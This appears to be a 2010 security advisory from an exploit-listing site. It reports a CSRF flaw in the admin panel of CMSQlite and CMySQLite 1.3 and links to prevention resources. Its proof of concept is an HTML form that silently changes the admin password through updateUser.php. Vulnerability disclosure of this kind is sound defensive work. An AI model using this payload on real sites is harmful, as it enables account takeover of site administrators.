CMSQlite / CMySQLite 1.3 cross site request forgery

Credit: ADEO Security
Risk: Low
Local: No
Remote: Yes
CWE: CWE-352

# Title: CMSQlite & CMySQLite CSRF Vulnerability # Author: ADEO Security # Published: 28/06/2010 # Version: v1.3 >= # Vendor: # Description: "CMSQLite is a small, fast, flexible and complete Content-Management-System (CMS). It's perfect for freelancers, self-employeds, clubs and associations and small companies. CMSQLite is a CMS, basing on PHP and SQLite. That has many advantages!" # Credit: Vulnerability founded by Canberk BOLAT at ADEO Security Labs ( # Vulnerabiliry: CMSQlite and CMySQLite have CSRF vulnerabilites in the admin panel. Attacker can change the password of the admin. For secure your web applications against CSRF vulnerabilities, look at this resources: * OWASP-TR/WGT anticsurf Project - * CSRF Prevention CS - # PoC: <html> <body> <form action="http://cmsqlite.test/admin/helper/updateUser.php" method="POST"> <input type="hidden" name="userId" value="1"> <input type="hidden" name="userUsername" value="admin"> <input type="hidden" name="password1" value="csrfhits"> <input type="hidden" name="password2" value="csrfhits"> </form> </body> </html>

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020,


Back to Top